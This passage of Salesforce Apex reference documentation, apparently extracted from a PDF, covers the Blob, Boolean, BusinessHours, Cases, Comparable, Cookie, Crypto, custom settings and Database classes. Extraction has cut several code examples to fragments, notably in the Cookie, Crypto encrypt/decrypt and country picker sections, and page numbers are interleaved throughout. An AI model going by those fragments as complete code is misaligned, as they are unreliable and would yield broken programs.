Account a = new account(name = 'test');
insert a;
Attachment attachmentPDF = new Attachment();
attachmentPdf.parentId = a.id;
attachmentPdf.name = account.name + '.pdf';
attachmentPdf.body = blob.toPDF(pdfContent);
insert attachmentPDF;
toString()
Casts the Blob into a String.
Signature
public String toString()
Return Value
Type: String
Example
String myString = 'StringToBlob';
Blob myBlob = Blob.valueof(myString);
System.assertEquals('StringToBlob', myBlob.toString());
valueOf(String)
Casts the specified String to a Blob.
Signature
public static Blob valueOf(String toBlob)
Parameters
toBlob
Type: String
1351
Reference
Boolean Class
Return Value
Type: Blob
Example
String myString = 'StringToBlob';
Blob myBlob = Blob.valueof(myString);
Boolean Class
Contains methods for the Boolean primitive data type.
Namespace
System
Boolean Methods
The following are methods for Boolean. All methods are static.
IN THIS SECTION:
valueOf(String)
Converts the specified string to a Boolean value and returns true if the specified string value is true. Otherwise, returns false.
valueOf(Object)
Converts the specified history tracking field value to a Boolean value.
valueOf(String)
Converts the specified string to a Boolean value and returns true if the specified string value is true. Otherwise, returns false.
Signature
public static Boolean valueOf(String toBoolean)
Parameters
toBoolean
Type: String
Return Value
Type: Boolean
Usage
If the specified argument is null, this method throws an exception.
1352
Reference
BusinessHours Class
Example
Boolean b = Boolean.valueOf('true');
System.assertEquals(true, b);
valueOf(Object)
Converts the specified history tracking field value to a Boolean value.
Signature
public static Boolean valueOf(Object fieldValue)
Parameters
fieldValue
Type: Object
Return Value
Type: Boolean
Usage
Use this method with the OldValue or NewValue fields of history sObjects, such as AccountHistory, when the field type
corresponds to a Boolean type, like a checkbox field.
Example:
Example
List<AccountHistory> ahlist =
[SELECT Field,OldValue,NewValue
FROM AccountHistory];
for(AccountHistory ah : ahlist) {
System.debug('Field: ' + ah.Field);
if (ah.field == 'IsPlatinum__c') {
Boolean oldValue =
Boolean.valueOf(ah.OldValue);
Boolean newValue =
Boolean.valueOf(ah.NewValue);
}
BusinessHours Class
Use the BusinessHours methods to set the business hours at which your customer support team operates.
Namespace
System
1353
Reference
BusinessHours Class
BusinessHours Methods
The following are methods for BusinessHours. All methods are static.
IN THIS SECTION:
add(String, Datetime, Long)
Adds an interval of time from a start Datetime traversing business hours only. Returns the result Datetime in the local time zone.
addGmt(String, Datetime, Long)
Adds an interval of milliseconds from a start Datetime traversing business hours only. Returns the result Datetime in GMT.
diff(String, Datetime, Datetime)
Returns the difference between a start and end Datetime based on a specific set of business hours.
isWithin(String, Datetime)
Returns true if the specified target date occurs within business hours. Holidays are included in the calculation.
nextStartDate(String, Datetime)
Starting from the specified target date, returns the next date when business hours are open. If the specified target date falls within
business hours, this target date is returned.
Signature
public static Datetime add(String businessHoursId, Datetime startDate, Long interval)
Parameters
businessHoursId
Type: String
startDate
Type: Datetime
interval
Type: Long
Interval value should be provided in milliseconds, however time precision smaller than one minute is ignored.
Return Value
Type: Datetime
Signature
public static Datetime addGmt(String businessHoursId, Datetime startDate, Long interval)
1354
Reference
BusinessHours Class
Parameters
businessHoursId
Type: String
startDate
Type: Datetime
interval
Type: Long
Return Value
Type: Datetime
Signature
public static Long diff(String businessHoursId, Datetime startDate, Datetime endDate)
Parameters
businessHoursId
Type: String
startDate
Type: Datetime
endDate
Type: Datetime
Return Value
Type: Long
isWithin(String, Datetime)
Returns true if the specified target date occurs within business hours. Holidays are included in the calculation.
Signature
public static Boolean isWithin(String businessHoursId, Datetime targetDate)
Parameters
businessHoursId
Type: String
The business hours ID.
targetDate
Type: Datetime
1355
Reference
BusinessHours Class
Return Value
Type: Boolean
Example
The following example finds whether a given time is within the default business hours.
// Get the default business hours
BusinessHours bh = [SELECT Id FROM BusinessHours WHERE IsDefault=true];
// Create Datetime on May 28, 2013 at 1:06:08 AM in the local timezone.
Datetime targetTime = Datetime.newInstance(2013, 5, 28, 1, 6, 8);
// Find whether the time is within the default business hours
Boolean isWithin= BusinessHours.isWithin(bh.id, targetTime);
nextStartDate(String, Datetime)
Starting from the specified target date, returns the next date when business hours are open. If the specified target date falls within
business hours, this target date is returned.
Signature
public static Datetime nextStartDate(String businessHoursId, Datetime targetDate)
Parameters
businessHoursId
Type: String
The business hours ID.
targetDate
Type: Datetime
The date used as a start date to obtain the next date.
Return Value
Type: Datetime
Example
The following example finds the next date starting from the target date when business hours reopens. If the target date is within the
given business hours, the target date is returned. The returned time is in the local time zone.
// Get the default business hours
BusinessHours bh = [SELECT Id FROM BusinessHours WHERE IsDefault=true];
// Create Datetime on May 28, 2013 at 1:06:08 AM in the local timezone.
Datetime targetTime = Datetime.newInstance(2013, 5, 28, 1, 6, 8);
1356
Reference
Cases Class
// Starting from the targetTime, find the next date when business hours reopens. Return
the target time.
// if it is within the business hours. The returned time will be in the local time zone
Datetime nextStart = BusinessHours.nextStartDate(bh.id, targetTime);
Cases Class
Use the Cases class to interact with case records.
Namespace
System
Cases Methods
The following are static methods for Cases.
IN THIS SECTION:
getCaseIdFromEmailThreadId(String)
Returns the case ID corresponding to the specified email thread ID.
getCaseIdFromEmailThreadId(String)
Returns the case ID corresponding to the specified email thread ID.
Signature
public static ID getCaseIdFromEmailThreadId(String emailThreadId)
Parameters
emailThreadId
Type: String
Return Value
Type: ID
Usage
The emailThreadId argument should have the following format: _00Dxx1gEW._500xxYktg. Other formats, such as
ref:_00Dxx1gEW._500xxYktl:ref and [ref:_00Dxx1gEW._500xxYktl:ref], are invalid.
Comparable Interface
Adds sorting support for Lists that contain non-primitive types, that is, Lists of user-defined types.
1357
Reference
Comparable Interface
Namespace
System
Usage
To add List sorting support for your Apex class, you must implement the Comparable interface with its compareTo method in
your class.
To implement the Comparable interface, you must first declare a class with the implements keyword as follows:
global class Employee implements Comparable {
Next, your class must provide an implementation for the following method:
global Integer compareTo(Object compareTo) {
// Your code here
}
Comparable Methods
The following are methods for Comparable.
IN THIS SECTION:
compareTo(Object)
Returns an Integer value that is the result of the comparison.
compareTo(Object)
Returns an Integer value that is the result of the comparison.
Signature
public Integer compareTo(Object objectToCompareTo)
Parameters
objectToCompareTo
Type: Object
1358
Reference
Comparable Interface
Return Value
Type: Integer
Usage
The implementation of this method should return the following values:
0 if this instance and objectToCompareTo are equal
> 0 if this instance is greater than objectToCompareTo
< 0 if this instance is less than objectToCompareTo
1359
Reference
Cookie Class
Cookie Class
The Cookie class lets you access cookies for your Force.com site using Apex.
Namespace
System
Usage
Use the setCookies method of the PageReference Class to attach cookies to a page.
Important:
Cookie names and values set in Apex are URL encoded, that is, characters such as @ are replaced with a percent sign and their
hexadecimal representation.
The setCookies method adds the prefix apex__ to the cookie names.
Setting a cookie's value to null sends a cookie with an empty string value instead of setting an expired attribute.
After you create a cookie, the properties of the cookie can't be changed.
Be careful when storing sensitive information in cookies. Pages are cached regardless of a cookie value. If you use a cookie
value to generate dynamic content, you should disable page caching. For more information, see Caching Force.com Sites
Pages in the Salesforce online help.
Consider the following limitations when using the Cookie class:
The Cookie class can only be accessed using Apex that is saved using the Salesforce API version 19 and above.
The maximum number of cookies that can be set per Force.com domain depends on your browser. Newer browsers have higher
limits than older ones.
Cookies must be less than 4K, including name and attributes.
For more information on sites, see Force.com Sites Overview in the Salesforce online help.
Example
The following example creates a class, CookieController, which is used with a Visualforce page (see markup below) to update
a counter each time a user displays a page. The number of times a user goes to the page is stored in a cookie.
// A Visualforce controller class that creates a cookie
// used to keep track of how often a user displays a page
public class CookieController {
1360
Reference
Cookie Class
public CookieController() {
Cookie counter = ApexPages.currentPage().getCookies().get('counter');
//
//
//
if
The following is the Visualforce page that uses the CookieController Apex controller above. The action {!count} calls the
getCount method in the controller above.
<apex:page controller="CookieController">
You have seen this page {!count} times
</apex:page>
1361
Reference
Cookie Class
IN THIS SECTION:
Cookie Constructors
Cookie Methods
Cookie Constructors
The following are constructors for Cookie.
IN THIS SECTION:
Cookie(String, String, String, Integer, Boolean)
Creates a new instance of the Cookie class using the specified name, value, path, age, and the secure setting.
Signature
public Cookie(String, String, String, Integer, Boolean)
Parameters
name
Type: String
The cookie name. It cant be null.
value
Type: String
The cookie data, such as session ID.
path
Type: String
The path from where you can retrieve the cookie.
maxAge
Type: Integer
A number representing how long a cookie is valid for in seconds. If set to less than zero, a session cookie is issued. If set to zero, the
cookie is deleted.
isSecure
Type: Boolean
A value indicating whether the cookie can only be accessed through HTTPS (true) or not (false).
Cookie Methods
The following are methods for Cookie. All are instance methods.
1362
Reference
Cookie Class
IN THIS SECTION:
getDomain()
Returns the name of the server making the request.
getMaxAge()
Returns a number representing how long the cookie is valid for, in seconds. If set to < 0, a session cookie is issued. If set to 0, the
cookie is deleted.
getName()
Returns the name of the cookie. Can't be null.
getPath()
Returns the path from which you can retrieve the cookie. If null or blank, the location is set to root, or /.
getValue()
Returns the data captured in the cookie, such as Session ID.
isSecure()
Returns true if the cookie can only be accessed through HTTPS, otherwise returns false.
getDomain()
Returns the name of the server making the request.
Signature
public String getDomain()
Return Value
Type: String
getMaxAge()
Returns a number representing how long the cookie is valid for, in seconds. If set to < 0, a session cookie is issued. If set to 0, the cookie
is deleted.
Signature
public Integer getMaxAge()
Return Value
Type: Integer
getName()
Returns the name of the cookie. Can't be null.
Signature
public String getName()
1363
Reference
Crypto Class
Return Value
Type: String
getPath()
Returns the path from which you can retrieve the cookie. If null or blank, the location is set to root, or /.
Signature
public String getPath()
Return Value
Type: String
getValue()
Returns the data captured in the cookie, such as Session ID.
Signature
public String getValue()
Return Value
Type: String
isSecure()
Returns true if the cookie can only be accessed through HTTPS, otherwise returns false.
Signature
public Boolean isSecure()
Return Value
Type: Boolean
Crypto Class
Provides methods for creating digests, message authentication codes, and signatures, as well as encrypting and decrypting information.
Namespace
System
1364
Reference
Crypto Class
Usage
The methods in the Crypto class can be used for securing content in Force.com, or for integrating with external services such as
Google or Amazon WebServices (AWS).
Message
Description
InvalidParameterValue
InvalidParameterValue
InvalidParameterValue
InvalidParameterValue
Invalid initialization vector. Must be 16 bytes. Thrown if the initialization vector isn't 16
bytes.
InvalidParameterValue
NullPointerException
SecurityException
SecurityException
Message Varies
Crypto Methods
The following are methods for Crypto. All methods are static.
1365
Reference
Crypto Class
IN THIS SECTION:
decrypt(String, Blob, Blob, Blob)
Decrypts the Blob cipherText using the specified algorithm, private key, and initialization vector. Use this method to decrypt
blobs encrypted using a third party application or the encrypt method.
decryptWithManagedIV(String, Blob, Blob)
Decrypts the Blob IVAndCipherText using the specified algorithm and private key. Use this method to decrypt blobs encrypted
using a third party application or the encryptWithManagedIV method.
encrypt(String, Blob, Blob, Blob)
Encrypts the Blob clearText using the specified algorithm, private key and initialization vector. Use this method when you want
to specify your own initialization vector.
encryptWithManagedIV(String, Blob, Blob)
Encrypts the Blob clearText using the specified algorithm and private key. Use this method when you want Salesforce to
generate the initialization vector for you.
generateAesKey(Integer)
Generates an Advanced Encryption Standard (AES) key.
generateDigest(String, Blob)
Computes a secure, one-way hash digest based on the supplied input string and algorithm name.
generateMac(String, Blob, Blob)
Computes a message authentication code (MAC) for the input string, using the private key and the specified algorithm.
getRandomInteger()
Returns a random Integer.
getRandomLong()
Returns a random Long.
sign(String, Blob, Blob)
Computes a unique digital signature for the input string, using the specified algorithm and the supplied private key.
signWithCertificate(String, Blob, String)
Computes a unique digital signature for the input string, using the specified algorithm and the supplied certificate and key pair.
signXML(String, Dom.XmlNode, String, String)
Envelops the signature into an XML document.
Signature
public static Blob decrypt(String algorithmName, Blob privateKey, Blob
initializationVector, Blob cipherText)
Parameters
algorithmName
Type: String
1366
Reference
Crypto Class
privateKey
Type: Blob
initializationVector
Type: Blob
cipherText
Type: Blob
Return Value
Type: Blob
Usage
Valid values for algorithmName are:
AES128
AES192
AES256
These are all industry standard Advanced Encryption Standard (AES) algorithms with different size keys. They use cipher block chaining
(CBC) and PKCS5 padding.
The length of privateKey must match the specified algorithm: 128 bits, 192 bits, or 256 bits, which is 16, 24, or 32 bytes, respectively.
You can use a third-party application or the generateAesKey method to generate this key for you.
The initialization vector must be 128 bits (16 bytes.)
Example
Blob
Blob
Blob
Blob
Signature
public static Blob decryptWithManagedIV(String algorithmName, Blob privateKey, Blob
IVAndCipherText)
Parameters
algorithmName
Type: String
1367
Reference
Crypto Class
privateKey
Type: Blob
IVAndCipherText
Type: Blob
The first 128 bits (16 bytes) of IVAndCipherText must contain the initialization vector.
Return Value
Type: Blob
Usage
Valid values for algorithmName are:
AES128
AES192
AES256
These are all industry standard Advanced Encryption Standard (AES) algorithms with different size keys. They use cipher block chaining
(CBC) and PKCS5 padding.
The length of privateKey must match the specified algorithm: 128 bits, 192 bits, or 256 bits, which is 16, 24, or 32 bytes, respectively.
You can use a third-party application or the generateAesKey method to generate this key for you.
Example
Blob key = Crypto.generateAesKey(128);
Blob data = Blob.valueOf('Data to be encrypted');
Blob encrypted = Crypto.encryptWithManagedIV('AES128', key, data);
Blob decrypted = Crypto.decryptWithManagedIV('AES128', key, encrypted);
String decryptedString = decrypted.toString();
System.assertEquals('Data to be encrypted', decryptedString);
Signature
public static Blob encrypt(String algorithmName, Blob privateKey, Blob
initializationVector, Blob clearText)
Parameters
algorithmName
Type: String
privateKey
Type: Blob
1368
Reference
Crypto Class
initializationVector
Type: Blob
clearText
Type: Blob
Return Value
Type: Blob
Usage
The initialization vector must be 128 bits (16 bytes.) Use either a third-party application or the decrypt method to decrypt blobs
encrypted using this method. Use the encryptWithManagedIV method if you want Salesforce to generate the initialization vector
for you. It is stored as the first 128 bits (16 bytes) of the encrypted Blob.
Valid values for algorithmName are:
AES128
AES192
AES256
These are all industry standard Advanced Encryption Standard (AES) algorithms with different size keys. They use cipher block chaining
(CBC) and PKCS5 padding.
The length of privateKey must match the specified algorithm: 128 bits, 192 bits, or 256 bits, which is 16, 24, or 32 bytes, respectively.
You can use a third-party application or the generateAesKey method to generate this key for you.
Example
Blob
Blob
Blob
Blob
Signature
public static Blob encryptWithManagedIV(String algorithmName, Blob privateKey, Blob
clearText)
Parameters
algorithmName
Type: String
1369
Reference
Crypto Class
privateKey
Type: Blob
clearText
Type: Blob
Return Value
Type: Blob
Usage
The initialization vector is stored as the first 128 bits (16 bytes) of the encrypted Blob. Use either third-party applications or the
decryptWithManagedIV method to decrypt blobs encrypted with this method. Use the encrypt method if you want to
generate your own initialization vector.
Valid values for algorithmName are:
AES128
AES192
AES256
These are all industry standard Advanced Encryption Standard (AES) algorithms with different size keys. They use cipher block chaining
(CBC) and PKCS5 padding.
The length of privateKey must match the specified algorithm: 128 bits, 192 bits, or 256 bits, which is 16, 24, or 32 bytes, respectively.
You can use a third-party application or the generateAesKey method to generate this key for you.
Example
Blob key = Crypto.generateAesKey(128);
Blob data = Blob.valueOf('Data to be encrypted');
Blob encrypted = Crypto.encryptWithManagedIV('AES128', key, data);
Blob decrypted = Crypto.decryptWithManagedIV('AES128', key, encrypted);
String decryptedString = decrypted.toString();
System.assertEquals('Data to be encrypted', decryptedString);
generateAesKey(Integer)
Generates an Advanced Encryption Standard (AES) key.
Signature
public static Blob generateAesKey(Integer size)
Parameters
size
Type: Integer
The key's size in bits. Valid values are:
128
1370
Reference
Crypto Class
192
256
Return Value
Type: Blob
Example
Blob key = Crypto.generateAesKey(128);
generateDigest(String, Blob)
Computes a secure, one-way hash digest based on the supplied input string and algorithm name.
Signature
public static Blob generateDigest(String algorithmName, Blob input)
Parameters
algorithmName
Type: String
Valid values for algorithmName are:
MD5
SHA1
SHA-256
SHA-512
input
Type: Blob
Return Value
Type: Blob
Example
Blob targetBlob = Blob.valueOf('ExampleMD5String');
Blob hash = Crypto.generateDigest('MD5', targetBlob);
Signature
public static Blob generateMac(String algorithmName, Blob input, Blob privateKey)
1371
Reference
Crypto Class
Parameters
algorithmName
Type: String
The valid values for algorithmName are:
hmacMD5
hmacSHA1
hmacSHA256
hmacSHA512
input
Type: Blob
privateKey
Type: Blob
The value of privateKey does not need to be in decoded form. The value cannot exceed 4 KB.
Return Value
Type: Blob
Example
String salt = String.valueOf(Crypto.getRandomInteger());
String key = 'key';
Blob data = crypto.generateMac('HmacSHA256',
Blob.valueOf(salt), Blob.valueOf(key));
getRandomInteger()
Returns a random Integer.
Signature
public static Integer getRandomInteger()
Return Value
Type: Integer
Example
Integer randomInt = Crypto.getRandomInteger();
getRandomLong()
Returns a random Long.
1372
Reference
Crypto Class
Signature
public static Long getRandomLong()
Return Value
Type: Long
Example
Long randomLong = Crypto.getRandomLong();
Signature
public static Blob sign(String algorithmName, Blob input, Blob privateKey)
Parameters
algorithmName
Type: String
The algorithm name. The valid values for algorithmName are RSA-SHA1, RSA-SHA256, or RSA.
RSA-SHA1 is an RSA signature (with an asymmetric key pair) of a SHA1 hash.
RSA-SHA256 is an RSA signature of a SHA256 hash.
RSA is the same as RSA-SHA1.
input
Type: Blob
The data to sign.
privateKey
Type: Blob
The value of privateKey must be decoded using the EncodingUtilbase64Decode method, and should be in RSA's
PKCS #8 (1.2) Private-Key Information Syntax Standard form. The value cannot exceed 4 KB.
Return Value
Type: Blob
Example
The following snippet shows how to call the sign method.
String algorithmName = 'RSA';
String key = '';
Blob privateKey = EncodingUtil.base64Decode(key);
1373
Reference
Crypto Class
Signature
public static Blob signWithCertificate(String algorithmName, Blob input, String
certDevName)
Parameters
algorithmName
Type: String
The algorithm name. The valid values for algorithmName are RSA-SHA1, RSA-SHA256, or RSA.
RSA-SHA1 is an RSA signature (with an asymmetric key pair) of a SHA1 hash.
RSA-SHA256 is an RSA signature of a SHA256 hash.
RSA is the same as RSA-SHA1.
input
Type: Blob
The data to sign.
certDevName
Type: String
The Unique Name for a certificate stored in the Salesforce organizations Certificate and Key Management page to use for signing.
To access the Certificate and Key Management page from Setup, click Security Controls > Certificate and Key Management.
Return Value
Type: Blob
Example
The following snippet is an example of the method for signing the content referenced by data.
Blob data = Blob.valueOf('12345qwerty');
System.Crypto.signWithCertificate('RSA-SHA256', data, 'signingCert');
Signature
public Void signXML(String algorithmName, Dom.XmlNode node, String idAttributeName,
String certDevName)
1374
Reference
Parameters
algorithmName
Type: String
The algorithm name. The valid values for algorithmName are RSA-SHA1, RSA-SHA256, or RSA.
RSA-SHA1 is an RSA signature (with an asymmetric key pair) of a SHA1 hash.
RSA-SHA256 is an RSA signature of a SHA256 hash.
RSA is the same as RSA-SHA1.
node
Type: Dom.XmlNode
The XML node to sign and insert the signature into.
idAttributeName
Type: String
The full name (including the namespace) of the attribute on the node (XmlNode) to use as the reference ID. If null, This mehod
uses the ID attribute on the node. If there is no ID attribute, Salesforce generates a new ID and modifies the node by inserting
this ID.
certDevName
Type: String
The Unique Name for a certificate stored in the Salesforce organizations Certificate and Key Management pageto use for signing.
To access the Certificate and Key Management page from Setup, click Security Controls > Certificate and Key Management.
Return Value
Type: Void
Example
The following snippet is an example declaration and initialization.
Dom.Document doc = new dom.Document();
doc.load(...);
System.Crypto.signXml('RSA-SHA256', doc.getRootElement(), null, 'signingCert');
return doc.toXmlString();
Usage
Custom settings methods are all instance methods, that is, they are called by and operate on a particular instance of a custom setting.
There are two types of custom settings: hierarchy and list. The methods are divided into those that work with list custom settings, and
those that work with hierarchy custom settings.
1375
Reference
Note: All custom settings data is exposed in the application cache, which enables efficient access without the cost of repeated
queries to the database. However, querying custom settings data using Standard Object Query Language (SOQL) doesn't make
use of the application cache and is similar to querying a custom object. To benefit from caching, use other methods for accessing
custom settings data such as the Apex Custom Settings methods.
For more information on creating custom settings in the Salesforce user interface, see Custom Settings Overview in the Salesforce
online help.
The following example uses a custom setting from Country and State Code Custom Settings Example. This example demonstrates that
the getValues and getInstance methods list custom setting return identical values.
Foundation_Countries__c myCS1 = Foundation_Countries__c.getValues('United States');
String myCCVal = myCS1.Country_code__c;
Foundation_Countries__c myCS2 = Foundation_Countries__c.getInstance('United States');
String myCCInst = myCS2.Country_code__c;
system.assertEquals(myCCinst, myCCVal);
Profile settings
OverrideMe: Goodbye
1376
Reference
User settings
OverrideMe: Fluffy
DontOverrideMe is not set.
The following example demonstrates the result of the getInstance method if Robert calls it in his organization:
Hierarchy__c CS = Hierarchy__c.getInstance();
System.Assert(CS.OverrideMe__c == 'Fluffy');
System.assert(CS.DontOverrideMe__c == 'World');
If Robert passes his user ID specified by RobertId to getInstance, the results are the same. This is because the lowest level of
data in the custom setting is specified at the user level.
Hierarchy__c CS = Hierarchy__c.getInstance(RobertId);
System.Assert(CS.OverrideMe__c == 'Fluffy');
System.assert(CS.DontOverrideMe__c == 'World');
If Robert passes the System Administrator profile ID specified by SysAdminID to getInstance, the result is different. The data
specified for the profile is returned:
Hierarchy__c CS = Hierarchy__c.getInstance(SysAdminID);
System.Assert(CS.OverrideMe__c == 'Goodbye');
System.assert(CS.DontOverrideMe__c == 'World');
When Robert tries to return the data set for the organization using getOrgDefaults, the result is:
Hierarchy__c CS = Hierarchy__c.getOrgDefaults();
System.Assert(CS.OverrideMe__c == 'Hello');
System.assert(CS.DontOverrideMe__c == 'World');
By using the getValues method, Robert can get the hierarchy custom setting values specific to his user and profile settings. For
example, if Robert passes his user ID RobertId to getValues, the result is:
Hierarchy__c CS = Hierarchy__c.getValues(RobertId);
System.Assert(CS.OverrideMe__c == 'Fluffy');
// Note how this value is null, because you are returning
// data specific for the user
System.assert(CS.DontOverrideMe__c == null);
If Robert passes his System Administrator profile ID SysAdminID to getValues, the result is:
Hierarchy__c CS = Hierarchy__c.getValues(SysAdminID);
System.Assert(CS.OverrideMe__c == 'Goodbye');
// Note how this value is null, because you are returning
// data specific for the profile
System.assert(CS.DontOverrideMe__c == null);
1377
Reference
The Foundation_States custom setting is also a List type of custom setting and has the following fields:
Country Code
State Code
State Name
The Visualforce page shows two picklists: one for country and one for state.
1378
Reference
<apex:page controller="CountryStatePicker">
<apex:form >
<apex:actionFunction name="rerenderStates" rerender="statesSelectList" >
<apex:param name="firstParam" assignTo="{!country}" value="" />
</apex:actionFunction>
<table><tbody>
<tr>
<th>Country</th>
<td>
<apex:selectList id="country" styleclass="std" size="1"
value="{!country}" onChange="rerenderStates(this.value)">
<apex:selectOptions value="{!countriesSelectList}"/>
</apex:selectList>
</td>
</tr>
<tr id="state_input">
<th>State/Province</th>
<td>
<apex:selectList id="statesSelectList" styleclass="std" size="1"
value="{!state}">
<apex:selectOptions value="{!statesSelectList}"/>
</apex:selectList>
</td>
</tr>
</tbody></table>
</apex:form>
</apex:page>
The Apex controller CountryStatePicker finds the values entered into the custom settings, then returns them to the Visualforce
page.
public with sharing class CountryStatePicker {
// Variables to store country and state selected by user
1379
Reference
1380
Reference
} else {
options.add(new SelectOption('', 'Not Required'));
}
return options;
}
}
IN THIS SECTION:
List Custom Setting Methods
Hierarchy Custom Setting Methods
SEE ALSO:
Custom Settings
getAll()
Returns a map of the data sets defined for the custom setting.
Signature
public Map<String, CustomSetting__c> getAll()
Return Value
Type: Map<String, CustomSetting__c>
Usage
If no data set is defined, this method returns an empty map.
Note: For Apex saved using SalesforceAPI version 20.0 or earlier, the data set names, which are the keys in the returned map, are
converted to lower case. For Apex saved using SalesforceAPI version 21.0 and later, the case of the data set names in the returned
map keys is not changed and the original case is preserved.
1381
Reference
getInstance(String)
Returns the custom setting data set record for the specified data set name. This method returns the exact same object as
getValues(dataset_name).
Signature
public CustomSetting__c getInstance(String dataset_name)
Parameters
dataset_name
Type: String
Return Value
Type: CustomSetting__c
Usage
If no data is defined for the specified data set, this method returns null.
getValues(String)
Returns the custom setting data set record for the specified data set name. This method returns the exact same object as
getInstance(dataset_name).
Signature
public CustomSetting__c getValues(String dataset_name)
Parameters
dataset_name
Type: String
Return Value
Type: CustomSetting__c
Usage
If no data is defined for the specified data set, this method returns null.
1382
Reference
IN THIS SECTION:
getInstance()
Returns a custom setting data set record for the current user. The fields returned in the custom setting record are merged based on
the lowest level fields that are defined in the hierarchy.
getInstance(ID)
Returns the custom setting data set record for the specified user ID. The lowest level custom setting record and fields are returned.
Use this when you want to explicitly retrieve data for the custom setting at the user level.
getInstance(ID)
Returns the custom setting data set record for the specified profile ID. The lowest level custom setting record and fields are returned.
Use this when you want to explicitly retrieve data for the custom setting at the profile level.
getOrgDefaults()
Returns the custom setting data set record for the organization.
getValues(ID)
Returns the custom setting data set record for the specified user ID.
getValues(ID)
Returns the custom setting data set for the specified profile ID.
getInstance()
Returns a custom setting data set record for the current user. The fields returned in the custom setting record are merged based on the
lowest level fields that are defined in the hierarchy.
Signature
public CustomSetting__c getInstance()
Return Value
Type: CustomSetting__c
Usage
If no custom setting data is defined for the user, this method returns a new custom setting object. The new custom setting object
contains an ID set to null and merged fields from higher in the hierarchy. You can add this new custom setting record for the user
by using insert or upsert. If no custom setting data is defined in the hierarchy, the returned custom setting has empty fields, except
for the SetupOwnerId field which contains the user ID.
Note: For Apex saved using Salesforce API version 21.0 or earlier, this method returns the custom setting data set record with
fields merged from field values defined at the lowest hierarchy level, starting with the user. Also, if no custom setting data is defined
in the hierarchy, this method returns null.
This method is equivalent to a method call to getInstance(User_Id) for the current user.
Example
Custom setting data set defined for the user: If you have a custom setting data set defined for the user Uriel Jones, for the profile
System Administrator, and for the organization as a whole, and the user running the code is Uriel Jones, this method returns the
custom setting record defined for Uriel Jones.
1383
Reference
Merged fields: If you have a custom setting data set with fields A and B for the user Uriel Jones and for the profile System
Administrator, and field A is defined for Uriel Jones, field B is null but is defined for the System Adminitrator profile, this method
returns the custom setting record for Uriel Jones with field A for Uriel Jones and field B from the System Administrator profile.
No custom setting data set record defined for the user: If the current user is Barbara Mahonie, who also shares the System
Administrator profile, but no data is defined for Barbara as a user, this method returns a new custom setting record with the ID set
to null and with fields merged based on the fields defined in the lowest level in the hierarchy.
getInstance(ID)
Returns the custom setting data set record for the specified user ID. The lowest level custom setting record and fields are returned. Use
this when you want to explicitly retrieve data for the custom setting at the user level.
Signature
public CustomSetting__c getInstance(ID user_Id)
Parameters
user_Id
Type: ID
Return Value
Type: CustomSetting__c
Usage
If no custom setting data is defined for the user, this method returns a new custom setting object. The new custom setting object
contains an ID set to null and merged fields from higher in the hierarchy. You can add this new custom setting record for the user
by using insert or upsert. If no custom setting data is defined in the hierarchy, the returned custom setting has empty fields, except
for the SetupOwnerId field which contains the user ID.
Note: For Apex saved using Salesforce API version 21.0 or earlier, this method returns the custom setting data set record with
fields merged from field values defined at the lowest hierarchy level, starting with the user. Also, if no custom setting data is defined
in the hierarchy, this method returns null.
getInstance(ID)
Returns the custom setting data set record for the specified profile ID. The lowest level custom setting record and fields are returned.
Use this when you want to explicitly retrieve data for the custom setting at the profile level.
Signature
public CustomSetting__c getInstance(ID profile_Id)
Parameters
profile_Id
Type: ID
1384
Reference
Return Value
Type: CustomSetting__c
Usage
If no custom setting data is defined for the profile, this method returns a new custom setting record. The new custom setting object
contains an ID set to null and with merged fields from your organization's default values. You can add this new custom setting for
the profile by using insert or upsert. If no custom setting data is defined in the hierarchy, the returned custom setting has empty
fields, except for the SetupOwnerId field which contains the profile ID.
Note: For Apex saved using SalesforceAPI version 21.0 or earlier, this method returns the custom setting data set record with
fields merged from field values defined at the lowest hierarchy level, starting with the profile. Also, if no custom setting data is
defined in the hierarchy, this method returns null.
getOrgDefaults()
Returns the custom setting data set record for the organization.
Signature
public CustomSetting__c getOrgDefaults()
Return Value
Type: CustomSetting__c
Usage
If no custom setting data is defined for the organization, this method returns an empty custom setting object.
Note: For Apex saved using SalesforceAPI version 21.0 or earlier, this method returns null if no custom setting data is defined
for the organization.
getValues(ID)
Returns the custom setting data set record for the specified user ID.
Signature
public CustomSetting__c getValues(ID user_Id)
Parameters
user_Id
Type: ID
Return Value
Type: CustomSetting__c
1385
Reference
Database Class
Usage
Use this if you only want the subset of custom setting data that has been defined at the user level. For example, suppose you have a
custom setting field that has been assigned a value of "foo" at the organizational level, but has no value assigned at the user or profile
level. Using getValues(User_Id) returns null for this custom setting field.
getValues(ID)
Returns the custom setting data set for the specified profile ID.
Signature
public CustomSetting__c getValues(ID Profile_Id)
Parameters
profile_Id
Type: ID
Return Value
Type: CustomSetting__c
Usage
Use this if you only want the subset of custom setting data that has been defined at the profile level. For example, suppose you have a
custom setting field that has been assigned a value of "foo" at the organizational level, but has no value assigned at the user or profile
level. Using getValues(Profile_Id) returns null for this custom setting field.
Database Class
Contains methods for creating and manipulating data.
Namespace
System
Usage
Some Database methods also exist as DML statements.
Database Methods
The following are methods for Database. All methods are static.
IN THIS SECTION:
convertLead(Database.LeadConvert, Boolean)
Converts a lead into an account and contact, as well as (optionally) an opportunity.
1386
Reference
Database Class
convertLead(Database.LeadConvert[], Boolean)
Converts a list of LeadConvert objects into accounts and contacts, as well as (optionally) opportunities.
countQuery(String)
Returns the number of records that a dynamic SOQL query would return when executed.
delete(SObject, Boolean)
Deletes an existing sObject record, such as an individual account or contact, from your organization's data.
delete(SObject[], Boolean)
Deletes a list of existing sObject records, such as individual accounts or contacts, from your organizations data.
delete(ID, Boolean)
Deletes existing sObject records, such as individual accounts or contacts, from your organizations data.
delete(ID[], Boolean)
Deletes a list of existing sObject records, such as individual accounts or contacts, from your organizations data.
emptyRecycleBin(ID[])
Permanently deletes the specified records from the Recycle Bin.
emptyRecycleBin(sObject)
Permanently deletes the specified sObject from the Recycle Bin.
emptyRecycleBin(sObject[])
Permanently deletes the specified sObjects from the Recycle Bin.
executeBatch(Object)
Submits a batch Apex job for execution corresponding to the specified class.
executeBatch(Object, Integer)
Submits a batch Apex job for execution using the the specified class and scope.
getDeleted(String, Datetime, Datetime)
Returns the list of individual records that have been deleted for an sObject type within the specified start and end dates and times
and that are still in the Recycle Bin.
getQueryLocator(sObject [])
Creates a QueryLocator object used in batch Apex or Visualforce.
getQueryLocator(String)
Creates a QueryLocator object used in batch Apex or Visualforce.
getUpdated(String, Datetime, Datetime)
Returns the list of individual records that have been updated for an sObject type within the specified start and end dates and times.
insert(sObject, Boolean)
